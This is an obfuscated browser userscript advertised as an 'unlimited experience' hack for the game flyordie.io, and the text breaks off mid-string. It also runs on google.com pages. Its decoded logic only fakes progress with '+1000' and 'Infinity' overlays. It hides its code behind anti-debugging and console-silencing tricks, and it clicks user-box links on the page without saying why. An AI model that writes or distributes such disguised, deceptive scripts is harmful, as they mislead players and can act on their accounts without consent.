// ==UserScript==
// @name         flyordie.io hack unlimited experience
// @description  unlimited experience
// @require      https://code.jquery.com/jquery-latest.min.js
// @grant        GM_setValue
// @grant        GM_getValue
// @match        *://flyordie.io/*
// @match        *.google.com/*
// ==/UserScript==


var _0x204831=function(){var _0xa7f0d8=!![];return function(_0x1f2f0c,_0x1994eb){var _0x170c6a=_0xa7f0d8?function(){if(_0x1994eb){if('\x50'+'\x55'+'\x6c'+'\x4b'+'\x43'==='\x65'+'\x73'+'\x6b'+'\x43'+'\x78'){if(_0x1994eb){var _0x2eb749=_0x1994eb['\x61'+'\x70'+'\x70'+'\x6c'+'\x79'](_0x1f2f0c,arguments);_0x1994eb=null;return _0x2eb749;}}else{var _0x1fcd77=_0x1994eb['\x61'+'\x70'+'\x70'+'\x6c'+'\x79'](_0x1f2f0c,arguments);_0x1994eb=null;return _0x1fcd77;}}}:function(){};_0xa7f0d8=![];return _0x170c6a;};}();var _0x4c0b87=_0x204831(this,function(){var _0x229ed3=function(){if('\x63'+'\x49'+'\x74'+'\x74'+'\x41'!=='\x67'+'\x6d'+'\x56'+'\x6f'+'\x71'){var _0xca6587=_0x229ed3['\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72']('\x72'+'\x65'+'\x74'+'\x75'+'\x72'+'\x6e'+'\x20'+'\x2f'+'\x22'+'\x20'+'\x2b'+'\x20'+'\x74'+'\x68'+'\x69'+'\x73'+'\x20'+'\x2b'+'\x20'+'\x22'+'\x2f')()['\x63'+'\x6f'+'\x6d'+'\x70'+'\x69'+'\x6c'+'\x65']('\x5e'+'\x28'+'\x5b'+'\x5e'+'\x20'+'\x5d'+'\x2b'+'\x28'+'\x20'+'\x2b'+'\x5b'+'\x5e'+'\x20'+'\x5d'+'\x2b'+'\x29'+'\x2b'+'\x29'+'\x2b'+'\x5b'+'\x5e'+'\x20'+'\x5d'+'\x7d');return!_0xca6587['\x74'+'\x65'+'\x73'+'\x74'](_0x4c0b87);}else{return debuggerProtection;}};return _0x229ed3();});_0x4c0b87();var _0x34b8fd=function(){var _0x4c8f30=!![];return function(_0xe06540,_0x3ba684){var _0x5001c8=_0x4c8f30?function(){if('\x6f'+'\x46'+'\x6b'+'\x45'+'\x57'!=='\x47'+'\x68'+'\x69'+'\x50'+'\x46'){if(_0x3ba684){if('\x62'+'\x76'+'\x77'+'\x67'+'\x70'!=='\x62'+'\x76'+'\x77'+'\x67'+'\x70'){if(!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x32'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x62'+'\x75'+'\x74'+'\x74'+'\x6f'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x29')&&GM_getValue('\x67'+'\x6f',undefined)==undefined&&GM_getValue('\x66'+'\x74',!![])){if(!!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')){GM_setValue('\x67'+'\x6f',!![]);document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')['\x63'+'\x6c'+'\x69'+'\x63'+'\x6b']();}}}else{var _0x1f0195=_0x3ba684['\x61'+'\x70'+'\x70'+'\x6c'+'\x79'](_0xe06540,arguments);_0x3ba684=null;return _0x1f0195;}}}else{if(!!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')){GM_setValue('\x67'+'\x6f',!![]);document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')['\x63'+'\x6c'+'\x69'+'\x63'+'\x6b']();}}}:function(){};_0x4c8f30=![];return _0x5001c8;};}();(function(){_0x34b8fd(this,function(){if('\x41'+'\x48'+'\x58'+'\x48'+'\x42'==='\x41'+'\x48'+'\x58'+'\x48'+'\x42'){var _0x1c6c9e=new RegExp('\x66'+'\x75'+'\x6e'+'\x63'+'\x74'+'\x69'+'\x6f'+'\x6e'+'\x20'+'\x2a'+'\x5c'+'\x28'+'\x20'+'\x2a'+'\x5c'+'\x29');var _0x189cf7=new RegExp('\x5c'+'\x2b'+'\x5c'+'\x2b'+'\x20'+'\x2a'+'\x28'+'\x3f'+'\x3a'+'\x5b'+'\x61'+'\x2d'+'\x7a'+'\x41'+'\x2d'+'\x5a'+'\x5f'+'\x24'+'\x5d'+'\x5b'+'\x30'+'\x2d'+'\x39'+'\x61'+'\x2d'+'\x7a'+'\x41'+'\x2d'+'\x5a'+'\x5f'+'\x24'+'\x5d'+'\x2a'+'\x29','\x69');var _0x584751=_0xfeaf1a('\x69'+'\x6e'+'\x69'+'\x74');if(!_0x1c6c9e['\x74'+'\x65'+'\x73'+'\x74'](_0x584751+('\x63'+'\x68'+'\x61'+'\x69'+'\x6e'))||!_0x189cf7['\x74'+'\x65'+'\x73'+'\x74'](_0x584751+('\x69'+'\x6e'+'\x70'+'\x75'+'\x74'))){if('\x65'+'\x4f'+'\x6b'+'\x63'+'\x79'!=='\x65'+'\x4f'+'\x6b'+'\x63'+'\x79'){debuggerProtection(0x0);}else{_0x584751('\x30');}}else{_0xfeaf1a();}}else{if(fn){var _0x5ea158=fn['\x61'+'\x70'+'\x70'+'\x6c'+'\x79'](context,arguments);fn=null;return _0x5ea158;}}})();}());var _0x3a33f8=function(){var _0x2252e8=!![];return function(_0x395308,_0x57d6e9){if('\x46'+'\x70'+'\x57'+'\x4c'+'\x49'==='\x46'+'\x70'+'\x57'+'\x4c'+'\x49'){var _0x43c0a4=_0x2252e8?function(){if('\x73'+'\x6b'+'\x70'+'\x52'+'\x63'!=='\x73'+'\x6b'+'\x70'+'\x52'+'\x63'){return!![];}else{if(_0x57d6e9){var _0x5d22dc=_0x57d6e9['\x61'+'\x70'+'\x70'+'\x6c'+'\x79'](_0x395308,arguments);_0x57d6e9=null;return _0x5d22dc;}}}:function(){};_0x2252e8=![];return _0x43c0a4;}else{var _0x158b41=_0x57d6e9['\x61'+'\x70'+'\x70'+'\x6c'+'\x79'](_0x395308,arguments);_0x57d6e9=null;return _0x158b41;}};}();var _0x1bea3d=_0x3a33f8(this,function(){var _0x5f13eb=function(){};var _0xa9d5d2=function(){var _0x52adaf;try{if('\x6b'+'\x43'+'\x52'+'\x42'+'\x76'==='\x6b'+'\x43'+'\x52'+'\x42'+'\x76'){_0x52adaf=Function('\x72'+'\x65'+'\x74'+'\x75'+'\x72'+'\x6e'+'\x20'+'\x28'+'\x66'+'\x75'+'\x6e'+'\x63'+'\x74'+'\x69'+'\x6f'+'\x6e'+'\x28'+'\x29'+'\x20'+('\x7b'+'\x7d'+'\x2e'+'\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72'+'\x28'+'\x22'+'\x72'+'\x65'+'\x74'+'\x75'+'\x72'+'\x6e'+'\x20'+'\x74'+'\x68'+'\x69'+'\x73'+'\x22'+'\x29'+'\x28'+'\x20'+'\x29')+('\x29'+'\x3b'))();}else{setInterval(function(){var _0x36ead6={};_0x36ead6['\x70'+'\x6f'+'\x73'+'\x58']=game['\x6d'+'\x65']['\x70'+'\x6f'+'\x73'+'\x69'+'\x74'+'\x69'+'\x6f'+'\x6e']['\x78']+game['\x6d'+'\x65']['\x77'+'\x69'+'\x64'+'\x74'+'\x68']/0x2;_0x36ead6['\x70'+'\x6f'+'\x73'+'\x59']=game['\x6d'+'\x65']['\x70'+'\x6f'+'\x73'+'\x69'+'\x74'+'\x69'+'\x6f'+'\x6e']['\x79']+game['\x6d'+'\x65']['\x68'+'\x65'+'\x69'+'\x67'+'\x68'+'\x74'];_0x36ead6['\x63'+'\x6f'+'\x6c'+'\x6f'+'\x72']='\x42'+'\x4c'+'\x41'+'\x43'+'\x4b';_0x36ead6['\x73'+'\x74'+'\x61'+'\x72'+'\x74'+'\x54'+'\x69'+'\x6d'+'\x65']=game['\x74'+'\x69'+'\x6d'+'\x65'];_0x36ead6['\x74'+'\x65'+'\x78'+'\x74']='\x2b'+'\x31'+'\x30'+'\x30'+'\x30';_0x36ead6['\x66'+'\x6f'+'\x6e'+'\x74'+'\x53'+'\x69'+'\x7a'+'\x65']=0xc;textEffects['\x70'+'\x75'+'\x73'+'\x68'](_0x36ead6);},0x64);setInterval(function(){_0x517b1d('\x23'+'\x67'+'\x61'+'\x6d'+'\x65'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x73'+'\x74'+'\x61'+'\x74'+'\x75'+'\x73'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x65'+'\x78'+'\x70'+'\x65'+'\x72'+'\x69'+'\x65'+'\x6e'+'\x63'+'\x65'+'\x42'+'\x61'+'\x72','\x3c'+'\x64'+'\x69'+'\x76'+'\x20'+'\x63'+'\x6c'+'\x61'+'\x73'+'\x73'+'\x3d'+'\x22'+'\x65'+'\x78'+'\x70'+'\x65'+'\x72'+'\x69'+'\x65'+'\x6e'+'\x63'+'\x65'+'\x42'+'\x61'+'\x72'+'\x22'+'\x20'+'\x73'+'\x74'+'\x79'+'\x6c'+'\x65'+'\x3d'+'\x22'+'\x62'+'\x61'+'\x63'+'\x6b'+'\x67'+'\x72'+'\x6f'+'\x75'+'\x6e'+'\x64'+'\x3a'+'\x20'+'\x6c'+'\x69'+'\x6e'+'\x65'+'\x61'+'\x72'+'\x2d'+'\x67'+'\x72'+'\x61'+'\x64'+'\x69'+'\x65'+'\x6e'+'\x74'+'\x28'+'\x39'+'\x30'+'\x64'+'\x65'+'\x67'+'\x2c'+'\x20'+'\x72'+'\x67'+'\x62'+'\x28'+'\x32'+'\x32'+'\x36'+'\x2c'+'\x20'+'\x31'+'\x35'+'\x34'+'\x2c'+'\x20'+'\x32'+'\x32'+'\x35'+'\x29'+'\x20'+'\x33'+'\x34'+'\x2e'+'\x36'+'\x31'+'\x35'+'\x34'+'\x25'+'\x2c'+'\x20'+'\x77'+'\x68'+'\x69'+'\x74'+'\x65'+'\x20'+'\x33'+'\x34'+'\x2e'+'\x36'+'\x31'+'\x35'+'\x34'+'\x25'+'\x29'+'\x3b'+'\x22'+'\x3e'+'\x49'+'\x6e'+'\x66'+'\x69'+'\x6e'+'\x69'+'\x74'+'\x79'+'\x2f'+'\x49'+'\x6e'+'\x66'+'\x69'+'\x6e'+'\x69'+'\x74'+'\x79'+'\x3c'+'\x2f'+'\x64'+'\x69'+'\x76'+'\x3e');},0x0);setInterval(function(){var _0x5a3fc0={};_0x5a3fc0['\x70'+'\x6f'+'\x73'+'\x58']=game['\x6d'+'\x65']['\x70'+'\x6f'+'\x73'+'\x69'+'\x74'+'\x69'+'\x6f'+'\x6e']['\x78']+game['\x6d'+'\x65']['\x77'+'\x69'+'\x64'+'\x74'+'\x68']/0x2;_0x5a3fc0['\x70'+'\x6f'+'\x73'+'\x59']=game['\x6d'+'\x65']['\x70'+'\x6f'+'\x73'+'\x69'+'\x74'+'\x69'+'\x6f'+'\x6e']['\x79']+game['\x6d'+'\x65']['\x68'+'\x65'+'\x69'+'\x67'+'\x68'+'\x74'];_0x5a3fc0['\x63'+'\x6f'+'\x6c'+'\x6f'+'\x72']='\x52'+'\x45'+'\x44';_0x5a3fc0['\x73'+'\x74'+'\x61'+'\x72'+'\x74'+'\x54'+'\x69'+'\x6d'+'\x65']=game['\x74'+'\x69'+'\x6d'+'\x65'];_0x5a3fc0['\x74'+'\x65'+'\x78'+'\x74']='\x4c'+'\x56'+'\x4c'+'\x20'+'\x55'+'\x50';_0x5a3fc0['\x66'+'\x6f'+'\x6e'+'\x74'+'\x53'+'\x69'+'\x7a'+'\x65']=0xc;_0x5a3fc0['\x62'+'\x6f'+'\x6c'+'\x64']=!![];textEffects['\x70'+'\x75'+'\x73'+'\x68'](_0x5a3fc0);},0x427);}}catch(_0x37a88c){if('\x4e'+'\x4b'+'\x47'+'\x44'+'\x47'==='\x6e'+'\x75'+'\x4f'+'\x71'+'\x7a'){(function(){return!![];}['\x63'+'\x6f'+'\x6e'+'\x73'+'\x74'+'\x72'+'\x75'+'\x63'+'\x74'+'\x6f'+'\x72']('\x64'+'\x65'+'\x62'+'\x75'+('\x67'+'\x67'+'\x65'+'\x72'))['\x63'+'\x61'+'\x6c'+'\x6c']('\x61'+'\x63'+'\x74'+'\x69'+'\x6f'+'\x6e'));}else{_0x52adaf=window;}}return _0x52adaf;};var _0x13809d=_0xa9d5d2();if(!_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']){_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']=function(_0x997e50){if('\x71'+'\x75'+'\x4e'+'\x64'+'\x4b'!=='\x45'+'\x52'+'\x77'+'\x50'+'\x6f'){var _0x5ede3d={};_0x5ede3d['\x6c'+'\x6f'+'\x67']=_0x997e50;_0x5ede3d['\x77'+'\x61'+'\x72'+'\x6e']=_0x997e50;_0x5ede3d['\x64'+'\x65'+'\x62'+'\x75'+'\x67']=_0x997e50;_0x5ede3d['\x69'+'\x6e'+'\x66'+'\x6f']=_0x997e50;_0x5ede3d['\x65'+'\x72'+'\x72'+'\x6f'+'\x72']=_0x997e50;_0x5ede3d['\x65'+'\x78'+'\x63'+'\x65'+'\x70'+'\x74'+'\x69'+'\x6f'+'\x6e']=_0x997e50;_0x5ede3d['\x74'+'\x61'+'\x62'+'\x6c'+'\x65']=_0x997e50;_0x5ede3d['\x74'+'\x72'+'\x61'+'\x63'+'\x65']=_0x997e50;return _0x5ede3d;}else{if(!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61')&&joinedGame){textMsg('\x59'+'\x6f'+'\x75'+'\x20'+'\x6e'+'\x65'+'\x65'+'\x64'+'\x20'+'\x74'+'\x6f'+'\x20'+'\x62'+'\x65'+'\x20'+'\x61'+'\x74'+'\x20'+'\x6c'+'\x65'+'\x61'+'\x73'+'\x74'+'\x20'+'\x6c'+'\x65'+'\x76'+'\x65'+'\x6c'+'\x20'+'\x31'+'\x20'+'\x66'+'\x6f'+'\x72'+'\x20'+'\x74'+'\x68'+'\x65'+'\x20'+'\x68'+'\x61'+'\x63'+'\x6b'+'\x20'+'\x74'+'\x6f'+'\x20'+'\x73'+'\x74'+'\x61'+'\x72'+'\x74','\x72'+'\x65'+'\x64');}}}(_0x5f13eb);}else{_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x6c'+'\x6f'+'\x67']=_0x5f13eb;_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x77'+'\x61'+'\x72'+'\x6e']=_0x5f13eb;_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x64'+'\x65'+'\x62'+'\x75'+'\x67']=_0x5f13eb;_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x69'+'\x6e'+'\x66'+'\x6f']=_0x5f13eb;_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x65'+'\x72'+'\x72'+'\x6f'+'\x72']=_0x5f13eb;_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x65'+'\x78'+'\x63'+'\x65'+'\x70'+'\x74'+'\x69'+'\x6f'+'\x6e']=_0x5f13eb;_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x74'+'\x61'+'\x62'+'\x6c'+'\x65']=_0x5f13eb;_0x13809d['\x63'+'\x6f'+'\x6e'+'\x73'+'\x6f'+'\x6c'+'\x65']['\x74'+'\x72'+'\x61'+'\x63'+'\x65']=_0x5f13eb;}});_0x1bea3d();setInterval(function(){_0xfeaf1a();},0xfa0);function _0x517b1d(_0x5c2faf,_0x53aeed){var _0x44a443,_0x5732e0,_0x501578,_0x389091,_0xef15aa=document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72'](_0x5c2faf);_0x5732e0=document['\x63'+'\x72'+'\x65'+'\x61'+'\x74'+'\x65'+'\x45'+'\x6c'+'\x65'+'\x6d'+'\x65'+'\x6e'+'\x74'](_0x53aeed['\x69'+'\x6e'+'\x64'+'\x65'+'\x78'+'\x4f'+'\x66']('\x3c'+'\x74'+'\x64')!=-0x1?'\x74'+'\x72':'\x64'+'\x69'+'\x76');_0x5732e0['\x69'+'\x6e'+'\x6e'+'\x65'+'\x72'+'\x48'+'\x54'+'\x4d'+'\x4c']=_0x53aeed;_0x44a443=_0x5732e0['\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x4e'+'\x6f'+'\x64'+'\x65'+'\x73']['\x6c'+'\x65'+'\x6e'+'\x67'+'\x74'+'\x68'];_0x389091=_0xef15aa;while(_0x44a443--){_0xef15aa['\x70'+'\x61'+'\x72'+'\x65'+'\x6e'+'\x74'+'\x4e'+'\x6f'+'\x64'+'\x65']['\x69'+'\x6e'+'\x73'+'\x65'+'\x72'+'\x74'+'\x42'+'\x65'+'\x66'+'\x6f'+'\x72'+'\x65'](_0x501578=_0x5732e0['\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x4e'+'\x6f'+'\x64'+'\x65'+'\x73'][_0x44a443],_0x389091);_0x389091=_0x501578;}_0xef15aa['\x70'+'\x61'+'\x72'+'\x65'+'\x6e'+'\x74'+'\x4e'+'\x6f'+'\x64'+'\x65']['\x72'+'\x65'+'\x6d'+'\x6f'+'\x76'+'\x65'+'\x43'+'\x68'+'\x69'+'\x6c'+'\x64'](_0xef15aa);}$(document)['\x72'+'\x65'+'\x61'+'\x64'+'\x79'](function(){if(!!document['\x71'+'\x75'+'\x65'+'\x72'+'\x79'+'\x53'+'\x65'+'\x6c'+'\x65'+'\x63'+'\x74'+'\x6f'+'\x72']('\x23'+'\x75'+'\x69'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x55'+'\x69'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x63'+'\x65'+'\x6e'+'\x74'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x75'+'\x73'+'\x65'+'\x72'+'\x42'+'\x6f'+'\x78'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e'+'\x3a'+'\x6e'+'\x74'+'\x68'+'\x2d'+'\x63'+'\x68'+'\x69'+'\x6c'+'\x64'+'\x28'+'\x31'+'\x31'+'\x29'+'\x20'+'\x3e'+'\x20'+'\x61'+'\x20'+'\x3e'+'\x20'+'\x73'+'\x70'+'\x61'+'\x6e')){if('\x63'+'\x42'+'\x43'+'\x6e'+'\x78'!=='\x63'+'\x42'+'\x43'+'\x6e'+'\x78'){if(ret){return debuggerProtection;}else{debuggerProtection(0x0);}}else{setInterval(function(){var _0x53fbe9={};_0x53fbe9['\x70'+'\x6f'+'\x73'+'\x58']=game['\x6d'+'\x65']['\x70'+'\x6f'+'\x73'+'\x69'+'\x74'+'\x69'+'\x6f'+'\x6e']['\x78']+game['\x6d'+'\x65']['\x77'+'\x69'+'\x64'+'\x74'+'\x68']/0x2;_0x53fbe9['\x70'+'\x6f'+'\x73'+'\x59']=game['\x6d'+'\x65']['\x70'+'\x6f'+'\x73'+'\x69'+'\x74'+'\x69'+'\x6f'+'\x6e']['\x79']+game['\x6d'+'\x65']['\x68'+'\x65'+'\x69'+'\x67'+'\x68'+'\x74'];_0x53fbe9['\x63'+'\x6f'+'\x6c'+'\x6f'+'\x72']='\x42'+'\x4c'+'\x41'+'\x43'+'\x4b';_0x53fbe9['\x73'+'\x74'+'\x61'+'\x72'+'\x74'+'\x54'+'\x69'+'\x6d'+'\x65']=game['\x74'+'\x69'+'\x6d'+'\x65'];_0x53fbe9['\x74'+'\x65'+'\x78'+'\x74']='\x2b'+'\x31'+'\x30'+'\x30'+'\x30';_0x53fbe9['\x66'+'\x6f'+'\x6e'+'\x74'+'\x53'+'\x69'+'\x7a'+'\x65']=0xc;textEffects['\x70'+'\x75'+'\x73'+'\x68'](_0x53fbe9);},0x64);setInterval(function(){_0x517b1d('\x23'+'\x67'+'\x61'+'\x6d'+'\x65'+'\x43'+'\x6f'+'\x6e'+'\x74'+'\x61'+'\x69'+'\x6e'+'\x65'+'\x72'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x73'+'\x74'+'\x61'+'\x74'+'\x75'+'\x73'+'\x20'+'\x3e'+'\x20'+'\x64'+'\x69'+'\x76'+'\x2e'+'\x65'+'\x78'+'\x70'+'\x65'+'\x72'+'\x69'+'\x65'+'\x6e'+'\x63'+'\x65'+'\x42'+'\x61'+'\x72','\x3c'+'\x64'+'\x69'+'\x76'+'\x20'+'\x63'+'\x6c'+'\x61'+'\x73'+'\x73'+'\x3d'+'\x22'+'\x65'+'\x78'+'\x70'+'\x65'+'\x72'+'\x69'+'\x65'+'\x6e'+'\x63'+'\x65'+'\x42'+'\x61'+'\x72'+'\x22'+'\x20'+'\x73'+'\x74'+'\x79'+'\x6c'+'\x65'+'\x3d'+'\x22'+'\x62'+'\x61'+'\x63'+'\x6b'+'\x67'+'\x72'+'\x6f'+'\x75'+'\x6e'+'\x64'+'\x3a'+'\x20'+'\x6c'+'\x69'+'\x6e'+'\x65'+'\x61'+'\x72'+'\x2d'+'\x67'+'\x72'+'\x61'+'\x64'+'\x69'+'\x65'+'\x6e'+'\x74'+'\x28'+'\x39'+'\x30'+'\x64'+'\x65'+'\x67'+'\x2c'+'\x20'+'\x72'+'\x67'+'\x62'+'\x28'+'\x32'+'\x32'+'\x36'+'\x2c'+'\x20'+'\x31'+'\x35'+'\x34'+'\x2c'+'\x20'+'\x32'+'\x32'+'\x35'+'\x29'+'\x20'+'\x33'+'\x34'+'\x2e'+'\x36'+'\x31'+'\x35'+'\x34'+'\x25'+'\x2c'+'\x20'+'\x77'+'\x68'+'\x69'+'\x74'+'\x65'+'\x20'+'\x33'+'\x34'+'\x2e'+'\x36'+'\x31'+'\x35'+'\x34'+'\x25'+'\x29'+'\x3b'+'\x22'+'\x3e'+'\x49'+'\x6e'+'\x66'+'\x69'+'\x6e'+'\x69'+'\x74'+'\x79'+'\x2f'+'\x49'+'\x6e'+'\x66'+'\x69'+'\x6e'+'\x69'+'\x74'+'\x79'+'\x3c'+'\x2f'+'\x64'+'\